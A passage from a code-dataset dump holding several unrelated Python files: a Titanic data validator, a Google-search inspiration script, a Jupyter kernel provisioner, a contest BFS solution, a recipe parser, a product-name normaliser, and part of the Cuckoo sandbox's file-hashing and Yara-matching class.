ValidationError\r\n\r\nfrom classification_model.config.core import config\r\n\r\n# from marshmallow import Schema, ValidationError, fields\r\n\r\n\r\ndef replace_interrogation_marks(*, input_data: pd.DataFrame) -> pd.DataFrame:\r\n \"\"\"replace interrogation marks by NaN values\"\"\"\r\n\r\n replaced_interrogation_data = input_data.copy().replace(\"?\", np.nan)\r\n\r\n return replaced_interrogation_data\r\n\r\n\r\ndef validate_inputs(*, input_data: pd.DataFrame) -> Tuple[pd.DataFrame, Optional[dict]]:\r\n \"\"\"Check model inputs for unprocessable values.\"\"\"\r\n\r\n # convert syntax error field names (beginning with numbers)\r\n input_data.rename(columns=config.model_config.variables_to_rename, inplace=True)\r\n\r\n # replace interrogation marks by NaN values\r\n validated_data = replace_interrogation_marks(input_data=input_data)\r\n\r\n errors = None\r\n\r\n # cast numerical variables as floats\r\n for var in config.model_config.numerical_vars:\r\n validated_data[var] = validated_data[var].astype(\"float\")\r\n\r\n try:\r\n # replace numpy nans so that pydantic can validate\r\n MultipleTitanicDataInputs(\r\n inputs=validated_data.replace({np.nan: None}).to_dict(orient=\"records\")\r\n )\r\n except ValidationError as error:\r\n errors = {e[\"loc\"][-1]: e[\"msg\"] for e in error.errors()}\r\n\r\n return validated_data, errors\r\n\r\n\r\nclass TitanicDataInputSchema(BaseModel):\r\n pclass: Optional[int]\r\n name: Optional[str]\r\n sex: Optional[str]\r\n age: Optional[float]\r\n sibsp: Optional[int]\r\n parch: Optional[int]\r\n ticket: Optional[str]\r\n fare: Optional[float]\r\n cabin: Optional[str]\r\n embarked: Optional[str]\r\n boat: Optional[str]\r\n body: Optional[float]\r\n home_dest: Optional[str]\r\n\r\n\r\nclass MultipleTitanicDataInputs(BaseModel):\r\n inputs: List[TitanicDataInputSchema]\r\n", "repo_name": "vinaykumarkonda/deployment_and_testing_of_machine_learning_model", "sub_path": "classification_model/processing/validation.py", "file_name": "validation.py", "file_ext": "py", "file_size_in_byte": 1943, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.DataFrame", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 20, "usage_type": "attribute"}, {"api_name": "classification_model.config.core.config.model_config", "line_number": 
24, "usage_type": "attribute"}, {"api_name": "classification_model.config.core.config", "line_number": 24, "usage_type": "name"}, {"api_name": "classification_model.config.core.config.model_config", "line_number": 32, "usage_type": "attribute"}, {"api_name": "classification_model.config.core.config", "line_number": 32, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pydantic.ValidationError", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 20, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 46, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 50, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 51, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 52, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 53, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 54, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 56, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 57, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 58, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 59, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 62, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}]} +{"seq_id": "72287397955", "text": "from googlesearch import search\nfrom random import choice\nimport webbrowser\nimport easygui as eg\n\neg.msgbox(msg=\"Tell me what you would like in a project and I shall search Google for you. 
This will trigger 3 pop up windows\", title=\"InPIration\", ok_button=\"Inspire Me!\")\nthings = []\nsuggestion = []\n\nfor i in range(3):\n things.append(eg.enterbox(msg=\"READY >>> \"))\n\ninspiration = str(things[0]+\" \"+things[1]+\" \"+things[2])\nprint(inspiration) #Debug\n\nfor item in search(inspiration, tld=\"co.uk\", num=3, stop=1, pause=2):\n print(item)\n suggestion.append(item)\n\nfor i in range(len(suggestion)):\n links = \"\\n\".join(suggestion[0:])\n \neg.textbox(msg=\"Hey I found these that might be of interest, I'll open one at random after you close this message\", text=links)\n \nwebbrowser.open(choice(suggestion))\n", "repo_name": "lesp/LXF249-InsPIration", "sub_path": "Inspiratron.py", "file_name": "Inspiratron.py", "file_ext": "py", "file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "easygui.msgbox", "line_number": 6, "usage_type": "call"}, {"api_name": "easygui.enterbox", "line_number": 11, "usage_type": "call"}, {"api_name": "googlesearch.search", "line_number": 16, "usage_type": "call"}, {"api_name": "easygui.textbox", "line_number": 23, "usage_type": "call"}, {"api_name": "webbrowser.open", "line_number": 25, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "44244809551", "text": "import io\nimport json\nimport logging\nimport os\nimport shlex\nimport subprocess\nimport tempfile\nimport typing\n\nfrom .base import HydraKernelProvisioner\n\nif typing.TYPE_CHECKING:\n from typing import Any, Dict, List, Optional\n\nLOG = logging.getLogger(__name__)\n\n\nclass LocalHydraKernelProvisioner(HydraKernelProvisioner):\n poll_interval = 0.1 # Checking local processes is cheap\n\n pid = None\n\n @property\n def has_process(self) -> bool:\n return self.pid is not None\n\n def reset(self):\n self.pid = None\n\n async def pre_launch(self, **kwargs: \"Any\") -> \"Dict[str, Any]\":\n kwargs = await super().pre_launch(**kwargs)\n # Override the kernel command; we need to spawn a background kernel\n # which requires using the agent wrapper.\n kwargs[\"cmd\"] = [\n \"hydra-agent\",\n f\"--kernel={self.binding.kernel}\",\n f\"--id={self.kernel_id}\",\n \"--debug\",\n ]\n return kwargs\n\n async def launch_kernel(self, command: \"List[str]\", **kwargs):\n command = [shlex.quote(arg) for arg in command]\n # In a kernel context, the STDOUT and STDERR file descriptors are\n # already piped to the iopub channel. 
Using `capture_output` will\n        # pipe those fds again, which ends up deadlocking subprocess.run.\n        # Instead, pipe both stdout and stderr to a temporary file.\n        with tempfile.TemporaryFile() as tmpf:\n            process = subprocess.run(\n                command,\n                stdout=tmpf,\n                stderr=tmpf,\n            )\n            # Reset stream for reading\n            tmpf.seek(0)\n            stdout = io.BytesIO(tmpf.read())\n            if process.returncode > 0:\n                raise RuntimeError(stdout.read())\n            subkernel = json.load(stdout)\n\n        self.pid = subkernel[\"pid\"]\n        conn_info = subkernel[\"connection\"]\n\n        LOG.info(f\"{self.binding.name}: connection={conn_info}\")\n\n        return conn_info\n\n    async def send_signal(self, signum: int) -> None:\n        try:\n            LOG.debug(f\"kill -{signum} {self.pid}\")\n            os.kill(self.pid, signum)\n        except ProcessLookupError:\n            self.reset()\n\n    async def poll(self) -> \"Optional[int]\":\n        try:\n            os.kill(self.pid, 0)\n        except OSError:\n            return -1\n", "repo_name": "ChameleonCloud/jupyterlab-chameleon", "sub_path": "hydra_kernel/provisioning/local.py", "file_name": "local.py", "file_ext": "py", "file_size_in_byte": 2336, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "typing.TYPE_CHECKING", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "base.HydraKernelProvisioner", "line_number": 18, "usage_type": "name"}, {"api_name": "shlex.quote", "line_number": 43, "usage_type": "call"}, {"api_name": "tempfile.TemporaryFile", "line_number": 48, "usage_type": "call"}, {"api_name": "subprocess.run", "line_number": 49, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 56, "usage_type": "call"}, {"api_name": "json.load", "line_number": 59, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 71, "usage_type": "call"}, {"api_name": "os.kill", "line_number": 77, "usage_type": "call"}]} +{"seq_id": "6505285017", "text": "# 230215 14466 Why Did the Cow Cross the Road 6\n\nimport sys\nfrom collections import deque\nfrom itertools import combinations\n\n# run BFS from (0,0).
check visited\n# cows not marked in visited can never be reached -> exclude them\n# count the number of cases (combinations)\n\ninput = sys.stdin.readline\n\ndef bfs(start):\n    global n, roads, visited, moves,answer\n\n    queue = deque([start])\n    visited[start[0]][start[1]] = 1\n\n    while queue:\n        now = queue.popleft()\n\n        for move in moves:\n            nxtR, nxtC = now[0] + move[0], now[1] + move[1]\n\n            if 0 <= nxtR < n and 0 <= nxtC < n:\n                if visited[nxtR][nxtC] == 0 and [nxtR,nxtC] not in roads[now[0]][now[1]]:\n                    queue.append([nxtR,nxtC])\n                    visited[nxtR][nxtC] = 1\n                    answer.add((tuple(start),(nxtR,nxtC)))\n\n\nn, k, r = map(int,input().split())\nroads = [[[] for i in range(n)] for j in range(n)]\n\nfor _ in range(r):\n    a,b, x,y = map(int,input().split())\n    roads[a-1][b-1].append([x-1,y-1])\n    roads[x-1][y-1].append([a-1,b-1])\n\ncows = []\n\nfor _ in range(k):\n    x, y = list(map(int,input().split()))\n    cows.append((x-1,y-1))\n\nstartToEnd = set(combinations(cows,2))\n\nanswer = set()\nmoves = [[0,1],[0,-1],[1,0],[-1,0]]\nfor cow in cows:\n    visited = [[0]*n for _ in range(n)]\n    if visited[cow[0]][cow[1]] == 0:\n        bfs(cow)\n\nprint(len(startToEnd.difference(answer)))", "repo_name": "seho27060/TIL", "sub_path": "Problem-Sovling/2023-02/230215_Algorithm/BOJ_14466_소가-건너지-건너간-이유-6.py", "file_name": "BOJ_14466_소가-건너지-건너간-이유-6.py", "file_ext": "py", "file_size_in_byte": 1418, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sys.stdin", "line_number": 11, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 16, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "10761984124", "text": "\n# coding: utf-8\n\n# In[153]:\n\n\nimport json,os,sys,re\n\n\n# In[32]:\n\n\n# f= open('/home/nishant/Downloads/allRecipesInStructure.txt','r')\n\n\n# In[154]:\n\n\nwith open('C:/Users/jaiu978/Desktop/allRecipesInStructure.txt','r') as myfile:\n    data=myfile.read()\n\n\n# In[155]:\n\n\nflis=data.split('\\n')\n\n\n# In[156]:\n\n\nflis = list(filter(None, flis))\n# print(str_list)\n\n\n# In[157]:\n\n\nrecipe=[]\n\n\n# In[158]:\n\n\nstrt=re.compile('START RECIPE')\ning=re.compile('INGREDIENTS')\ndirec=re.compile('DIRECTIONS')\n\n\n# In[159]:\n\n\nunit=['cup','tbsp','tablespoon','teaspoon','ounce']\n\n\n# In[160]:\n\n\nfor idx,i in enumerate(flis):\n# print(i)\n    if strt.search(i):\n        recipe.append(idx)\n\n\n# In[161]:\n\n\na=[(x,y) for x,y in zip(recipe,recipe[1:])]\n# print(lis[a[0][0]:a[0][1]])\n\n\n# In[165]:\n\n\nfor j in a:\n    lis=flis[j[0]:j[1]]\n    out={}\n    out['id']=''\n    out['RecipeName']=''\n    out['Ingredients']=[]\n    out['instructions']=''\n    for idx,i in enumerate(lis):\n    # print(i)\n        if strt.search(i):\n            s_id=idx\n        elif ing.search(i):\n            i_id=idx\n        elif direc.search(i):\n            d_id=idx\n# print(not i_id)\n    for k in lis[s_id+1:i_id]:\n        if re.search('([A-Z\\\\s]){1,}$',k.strip()) and 'recipe by' not in k.lower():\n\n            out['RecipeName']=k.strip()\n    if not out['RecipeName']:\n        try:\n            out['RecipeName']=lis[s_id+1]\n        except IndexError:\n            continue\n\n    for idx,k in enumerate(lis[i_id+1:d_id]):\n        dic={}\n        dic['i_id']=''\n        try:\n            dic['quantity']=re.match('([\\\\d/.\\\\- ]){1,}',k).group(0)\n        except AttributeError:\n            dic['quantity']=''\n\n        try:\n            dic['unit']=unit[[i for i, j in enumerate([re.search(x,k.lower()) for x in unit]) if j is not None][0]]\n        except IndexError:\n            dic['unit']=''\n        if dic['unit']:\n            re.search\n    # print(dic['quantity'])\n            qty=re.compile(dic['quantity'])\n            ingr=re.sub(dic['unit'],'',k)\n            
ingr=re.sub(dic['quantity'],'',ingr).strip()\n            dic['ingredientName']=re.sub('^(s )','',ingr)\n        out['Ingredients'].append(dic)\n    out['instructions']=' '.join(lis[d_id+1:])\n\n    print(json.dumps(out))\n\n", "repo_name": "jaiutkarsh02/Recipe_list", "sub_path": "recipe_final.py", "file_name": "recipe_final.py", "file_ext": "py", "file_size_in_byte": 2209, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "re.compile", "line_number": 45, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 46, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 47, "usage_type": "call"}, {"api_name": "re.search", "line_number": 92, "usage_type": "call"}, {"api_name": "re.match", "line_number": 105, "usage_type": "call"}, {"api_name": "re.search", "line_number": 110, "usage_type": "call"}, {"api_name": "re.search", "line_number": 114, "usage_type": "attribute"}, {"api_name": "re.compile", "line_number": 116, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 117, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 118, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 119, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 123, "usage_type": "call"}]} +{"seq_id": "19825995544", "text": "# coding=utf-8\n\"\"\" As a solution I chose to build dictionaries from a file with normalized data.\nFor each dictionary I created 2 files: the first held the non-normalized data,\nthe second the result of manual processing. I also created a file with the source (non-normalized)\ndata and an empty file for the result.\nThe input data is processed with the FlashText library, which scans the whole text\nand replaces words with their corresponding keywords from the dictionary in one pass.\nThe results produced by this library were written to Excel.\nAs the library for writing the result to Excel I used Pandas.\"\"\"\nfrom flashtext import KeywordProcessor\nimport codecs\nimport pandas as pd\nkeyword_processor = KeywordProcessor()\n#\n# this part extracts the brand\n#\n# lists for building the brand dictionary, read from the files line by line\ntext1 = []\ntext2 = []\n# read the lines from the files and append them to the lists\nlines1 = (line.rstrip('\\n') for line in open(\"text1.txt\"))\nfor line in lines1:\n    text1.append(line)\n\nlines2 = (line.rstrip('\\n') for line in open(\"text2.txt\"))\nfor line in lines2:\n    text2.append(line)\n# build lists of lists (of the form [a,[b]]) to create the dictionary\ncompany_list = [[] for _ in range(len(text1))]\ncompany_full = [[] for _ in range(len(text1))]\n\nfor i in range(len(text1)):\n    company_full[i].append(text1[i])\nfor i in range(len(text1)):\n    company_list[i].append(text2[i])\n    company_list[i].append(company_full[i])\n# convert to a dict and add it to the FlashText keyword dictionary\ncompany_dict = dict(company_list)\nkeyword_processor.add_keywords_from_dict(company_dict)\n# create a list for reading lines from the given file with non-normalized data,\n# so they can be run through the FlashText library and the \"keywords\" written to the resulting file of brand names\ndone_list = []\nlines_done = (line.rstrip('\\n') for line in codecs.open(\"done.txt\", encoding = 'utf8'))\nfor line in lines_done:\n    done_list.append(line)\n# write the keywords to the file line by line\nwith codecs.open(\"brands_new.txt\", 'w') as file:\n    for row in done_list:\n        brand = keyword_processor.extract_keywords(row)\n        file.write('%s\\n' %
brand)\n\n#\n# part for grams/liters/pieces\n#\n# define a new FlashText keyword dictionary for numeric values\nkeyword_for_numbers = KeywordProcessor()\n# lists for building the numbers dictionary, read from the files line by line\nnum1 = []\nnum2 = []\n# read the lines from the files and append them to the lists\nlines1 = (line.rstrip('\\n') for line in open(\"num1.txt\"))\nfor line in lines1:\n    num1.append(line)\n\nlines2 = (line.rstrip('\\n') for line in open(\"num2.txt\"))\nfor line in lines2:\n    num2.append(line)\n# build lists of lists (of the form [a,[b]]) to create the dictionary\nnum_list = [[] for _ in range(len(num1))]\nnum_full = [[] for _ in range(len(num1))]\n\nfor i in range(len(num1)):\n    num_full[i].append(num1[i])\nfor i in range(len(num1)):\n    num_list[i].append(num2[i])\n    num_list[i].append(num_full[i])\n# convert to a dict and add it to the FlashText keyword dictionary\nnum_dict = dict(num_list)\nkeyword_for_numbers.add_keywords_from_dict(num_dict)\n# create a list for reading lines from the given file with non-normalized data\nnum_done_list = []\n\nlines_done = (line.rstrip('\\n') for line in codecs.open(\"done.txt\", encoding = 'utf8'))\nfor line in lines_done:\n    num_done_list.append(line)\n# write the keywords to the file line by line\nwith codecs.open(\"numbers_new.txt\", 'w') as file:\n    for row in num_done_list:\n        numbers = keyword_for_numbers.extract_keywords(row)\n        file.write('%s\\n' % numbers)\n\n#\n# part for the product name\n#\n# define a new FlashText keyword dictionary\nkeyword_for_name = KeywordProcessor()\n# lists for building the names dictionary, read from the files line by line\nname1 = []\nname2 = []\n# read the lines from the files and append them to the lists\nlines1 = (line.rstrip('\\n') for line in open(\"name1.txt\"))\nfor line in lines1:\n    name1.append(line)\n\nlines2 = (line.rstrip('\\n') for line in open(\"name2.txt\"))\nfor line in lines2:\n    name2.append(line)\n# build lists of lists (of the form [a,[b]]) to create the dictionary\nname_list = [[] for _ in range(len(name1))]\nname_full = [[] for _ in range(len(name1))]\n\nfor i in range(len(name1)):\n    name_full[i].append(name1[i])\nfor i in range(len(name1)):\n    name_list[i].append(name2[i])\n    name_list[i].append(name_full[i])\n# convert to a dict and add it to the FlashText keyword dictionary\nname_dict = dict(name_list)\nkeyword_for_name.add_keywords_from_dict(name_dict)\n# create a list for reading lines from the given file with non-normalized data\nname_done_list = []\n\nlines_done = (line.rstrip('\\n') for line in codecs.open(\"done.txt\", encoding = 'utf8'))\nfor line in lines_done:\n    name_done_list.append(line)\n# write the keywords to the file line by line\nwith codecs.open(\"name_new.txt\", 'w') as file:\n    for row in name_done_list:\n        names = keyword_for_name.extract_keywords(row)\n        file.write('%s\\n' % names)\n\n#\n# part that writes to Excel\n#\nbrand = [] # list of brands to write to Excel\nname = [] # list of product names\nweight = [] # list of weights/volumes\n# append the brand names to the lists\nlines_done = (line.rstrip('\\n').rstrip(\"']\").lstrip(\"['\") for line in codecs.open(\"brands_new.txt\", encoding = 'utf8'))\nfor line in lines_done:\n    brand.append(line)\n# append the product names to the lists\nlines_done = (line.rstrip('\\n').rstrip(\"']\").lstrip(\"['\") for line in codecs.open(\"name_new.txt\", encoding = 'utf8'))\nfor line in lines_done:\n    name.append(line)\n# append the weights/volumes to the lists\nlines_done = (line.rstrip('\\n').rstrip(\"']\").lstrip(\"['\") for line in
codecs.open(\"numbers_new.txt\", encoding = 'utf8'))\nfor line in lines_done:\n    weight.append(line)\n# create the cols list with the column headers\ncols = ['Short name', 'Brand', 'Name from receipt', 'Weight/volume']\n# create the rows list that holds the rows, adding the previously built lists with the processed data\nrows = [done_list, brand, name, weight]\n# store a Pandas DataFrame in the df variable\ndf = pd.DataFrame({\n    cols[0]:rows[0],\n    cols[1]:rows[1],\n    cols[2]:rows[2],\n    cols[3]:rows[3]\n})\n# write to the Excel file\ndf.to_excel('./normalized.xlsx')\n", "repo_name": "karinka22149/test_case", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 8327, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flashtext.KeywordProcessor", "line_number": 13, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 43, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 47, "usage_type": "call"}, {"api_name": "flashtext.KeywordProcessor", "line_number": 56, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 83, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 87, "usage_type": "call"}, {"api_name": "flashtext.KeywordProcessor", "line_number": 96, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 123, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 127, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 139, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 143, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 147, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 155, "usage_type": "call"}]} +{"seq_id": "25222555314", "text": "import base64\nimport binascii\nimport hashlib\nimport logging\nimport mmap\nimport os\nimport pefile\nimport re\nimport sflock\nimport shutil\nimport tempfile\nimport zipfile\n\nfrom cuckoo.common.safelist import is_safelisted_domain\n\ntry:\n    import pydeep\n    HAVE_PYDEEP = True\nexcept ImportError:\n    HAVE_PYDEEP = False\n\nlog = logging.getLogger(__name__)\n\nFILE_CHUNK_SIZE = 16*1024*1024\n\nURL_REGEX = (\n    # HTTP/HTTPS.\n    \"(https?:\\\\/\\\\/)\"\n    \"(([\"\n    # IP address.\n    \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.\"\n    \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.\"\n    \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\\\.\"\n    \"(?:[0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])]|\"\n    # Or domain name.\n    \"[a-zA-Z0-9\\\\.-]+)\"\n    # Optional port.\n    \"(\\\\:\\\\d+)?\"\n    # URI.\n    \"(/[\\\\(\\\\)a-zA-Z0-9_:%?=/\\\\.-]*)?\"\n)\n\nPUBPRIVKEY = (\n    \"(\"\n    \"(?:-----BEGIN PUBLIC KEY-----\"\n    \"[a-zA-Z0-9\\\\n\\\\+/]+\"\n    \"-----END PUBLIC KEY-----)\"\n    \"|\"\n    \"(?:-----BEGIN RSA PRIVATE KEY-----\"\n    \"[a-zA-Z0-9\\\\n\\\\+/]+\"\n    \"-----END RSA PRIVATE KEY-----)\"\n    \")\"\n)\n\nclass Dictionary(dict):\n    \"\"\"Cuckoo custom dict.\"\"\"\n\n    def __getattr__(self, key):\n        return self.get(key, None)\n\n    __setattr__ = dict.__setitem__\n    __delattr__ = dict.__delitem__\n\nclass URL:\n    \"\"\"URL base object.\"\"\"\n\n    def __init__(self, url):\n        \"\"\"@param url: URL\"\"\"\n        self.url = url\n\nclass File(object):\n    \"\"\"Basic file object class with all useful utilities.\"\"\"\n    # Given that ssdeep hashes are not really used much in practice we're just\n    # going to disable its warning by default for now.\n    notified_pydeep = True\n\n    # The yara
rules should not change during one Cuckoo run and as such we're\n # caching 'em. This dictionary is filled during init_yara().\n yara_rules = {}\n\n def __init__(self, file_path, temporary=False):\n \"\"\"@param file_path: file path.\"\"\"\n self.file_path = file_path\n self.temporary = temporary\n\n # these will be populated when first accessed\n self._file_data = None\n self._crc32 = None\n self._md5 = None\n self._sha1 = None\n self._sha256 = None\n self._sha512 = None\n\n def __del__(self):\n self.temporary and os.unlink(self.file_path)\n\n def get_name(self):\n \"\"\"Get file name.\n @return: file name.\n \"\"\"\n file_name = os.path.basename(self.file_path)\n return file_name\n\n def valid(self):\n return (\n self.file_path and\n os.path.exists(self.file_path) and\n os.path.isfile(self.file_path) and\n os.path.getsize(self.file_path) != 0\n )\n\n def get_data(self):\n \"\"\"Read file contents.\n @return: data.\n \"\"\"\n return self.file_data\n\n def get_chunks(self):\n \"\"\"Read file contents in chunks (generator).\"\"\"\n\n with open(self.file_path, \"rb\") as fd:\n while True:\n chunk = fd.read(FILE_CHUNK_SIZE)\n if not chunk:\n break\n yield chunk\n\n def calc_hashes(self):\n \"\"\"Calculate all possible hashes for this file.\"\"\"\n crc = 0\n md5 = hashlib.md5()\n sha1 = hashlib.sha1()\n sha256 = hashlib.sha256()\n sha512 = hashlib.sha512()\n\n for chunk in self.get_chunks():\n crc = binascii.crc32(chunk, crc)\n md5.update(chunk)\n sha1.update(chunk)\n sha256.update(chunk)\n sha512.update(chunk)\n\n self._crc32 = \"\".join(\"%02X\" % ((crc >> i) & 0xff)\n for i in [24, 16, 8, 0])\n self._md5 = md5.hexdigest()\n self._sha1 = sha1.hexdigest()\n self._sha256 = sha256.hexdigest()\n self._sha512 = sha512.hexdigest()\n\n @property\n def file_data(self):\n if not self._file_data:\n self._file_data = open(self.file_path, \"rb\").read()\n return self._file_data\n\n def get_size(self):\n \"\"\"Get file size.\n @return: file size.\n \"\"\"\n return os.path.getsize(self.file_path)\n\n def get_crc32(self):\n \"\"\"Get CRC32.\n @return: CRC32.\n \"\"\"\n if not self._crc32:\n self.calc_hashes()\n return self._crc32\n\n def get_md5(self):\n \"\"\"Get MD5.\n @return: MD5.\n \"\"\"\n if not self._md5:\n self.calc_hashes()\n return self._md5\n\n def get_sha1(self):\n \"\"\"Get SHA1.\n @return: SHA1.\n \"\"\"\n if not self._sha1:\n self.calc_hashes()\n return self._sha1\n\n def get_sha256(self):\n \"\"\"Get SHA256.\n @return: SHA256.\n \"\"\"\n if not self._sha256:\n self.calc_hashes()\n return self._sha256\n\n def get_sha512(self):\n \"\"\"\n Get SHA512.\n @return: SHA512.\n \"\"\"\n if not self._sha512:\n self.calc_hashes()\n return self._sha512\n\n def get_ssdeep(self):\n \"\"\"Get SSDEEP.\n @return: SSDEEP.\n \"\"\"\n if not HAVE_PYDEEP:\n if not File.notified_pydeep:\n File.notified_pydeep = True\n log.warning(\"Unable to import pydeep (install with `pip install pydeep`)\")\n return None\n\n try:\n return pydeep.hash_file(self.file_path)\n except Exception:\n return None\n\n def get_type(self):\n \"\"\"Get MIME file type.\n @return: file type.\n \"\"\"\n return sflock.magic.from_file(\n os.path.realpath(self.file_path)\n )\n\n def get_content_type(self):\n \"\"\"Get MIME content file type (example: image/jpeg).\n @return: file content type.\n \"\"\"\n return sflock.magic.from_file(\n os.path.realpath(self.file_path), mime=True\n )\n\n def get_exported_functions(self):\n \"\"\"Get the exported function names of this PE file.\"\"\"\n filetype = self.get_type()\n if \"MS-DOS\" not in filetype 
and \"PE32\" not in self.get_type():\n return\n\n try:\n pe = pefile.PE(self.file_path)\n if not hasattr(pe, \"DIRECTORY_ENTRY_EXPORT\"):\n return\n\n for export in pe.DIRECTORY_ENTRY_EXPORT.symbols:\n if export.name:\n yield export.name\n except Exception as e:\n log.warning(\"Error enumerating exported functions: %s\", e)\n\n def get_imported_functions(self):\n \"\"\"Get the imported functions of this PE file.\"\"\"\n filetype = self.get_type()\n if \"MS-DOS\" not in filetype and \"PE32\" not in self.get_type():\n return\n\n try:\n pe = pefile.PE(self.file_path)\n if not hasattr(pe, \"DIRECTORY_ENTRY_IMPORT\"):\n return\n\n for imp in pe.DIRECTORY_ENTRY_IMPORT:\n for entry in imp.imports:\n yield dict(dll=imp.dll,\n name=entry.name,\n ordinal=entry.ordinal,\n hint=entry.hint,\n address=entry.address)\n except Exception as e:\n log.warning(\"Error enumerating imported functions: %s\", e)\n\n def get_apk_entry(self):\n \"\"\"Get the entry point for this APK. The entry point is denoted by a\n package and main activity name.\"\"\"\n filetype = self.get_type()\n if \"Zip archive data\" not in filetype and \"Java archive data\" not in filetype:\n return \"\", \"\"\n\n from androguard.core.bytecodes.apk import APK\n\n try:\n a = APK(self.file_path)\n if not a.is_valid_APK():\n return \"\", \"\"\n\n package = a.get_package()\n if not package:\n log.warning(\"Unable to find the main package, this analysis \"\n \"will probably fail.\")\n return \"\", \"\"\n\n main_activity = a.get_main_activity()\n if main_activity:\n log.debug(\"Picked package %s and main activity %s.\",\n package, main_activity)\n return package, main_activity\n\n activities = a.get_activities()\n for activity in activities:\n if \"main\" in activity or \"start\" in activity:\n log.debug(\"Choosing package %s and main activity due to \"\n \"its name %s.\", package, activity)\n return package, activity\n\n if activities and activities[0]:\n log.debug(\"Picked package %s and the first activity %s.\",\n package, activities[0])\n return package, activities[0]\n except Exception as e:\n log.warning(\"Error extracting package and main activity: %s.\", e)\n\n return \"\", \"\"\n\n def get_yara(self, category=\"binaries\", externals=None):\n \"\"\"Get Yara signatures matches.\n @return: matched Yara signatures.\n \"\"\"\n if not os.path.getsize(self.file_path):\n return []\n\n try:\n # TODO Once Yara obtains proper Unicode filepath support we can\n # remove this check. 
See also the following Github issue:\n # https://github.com/VirusTotal/yara-python/issues/48\n assert len(str(self.file_path)) == len(self.file_path)\n except (UnicodeEncodeError, AssertionError):\n log.warning(\n \"Can't run Yara rules on %r as Unicode paths are currently \"\n \"not supported in combination with Yara!\", self.file_path\n )\n return []\n\n results, rule = [], File.yara_rules[category]\n for match in rule.match(self.file_path, externals=externals):\n strings, offsets = set(), {}\n for _, key, value in match.strings:\n strings.add(base64.b64encode(value))\n offsets[key.lstrip(\"$\")] = []\n\n strings = sorted(strings)\n for offset, key, value in match.strings:\n offsets[key.lstrip(\"$\")].append(\n (offset, strings.index(base64.b64encode(value)))\n )\n\n meta = {\n \"description\": \"(no description)\",\n }\n meta.update(match.meta)\n\n results.append({\n \"name\": match.rule,\n \"meta\": meta,\n \"strings\": strings,\n \"offsets\": offsets,\n })\n\n return results\n\n def mmap(self, fileno):\n if hasattr(mmap, \"PROT_READ\"):\n access = mmap.PROT_READ\n elif hasattr(mmap, \"ACCESS_READ\"):\n access = mmap.ACCESS_READ\n else:\n log.warning(\n \"Regexing through a file is not supported on your OS!\"\n )\n return\n\n return mmap.mmap(fileno, 0, access=access)\n\n def get_urls(self):\n \"\"\"Extract all URLs embedded in this file through a simple regex.\"\"\"\n if not os.path.getsize(self.file_path):\n return []\n\n # http://stackoverflow.com/a/454589\n urls, f = set(), open(self.file_path, \"rb\")\n 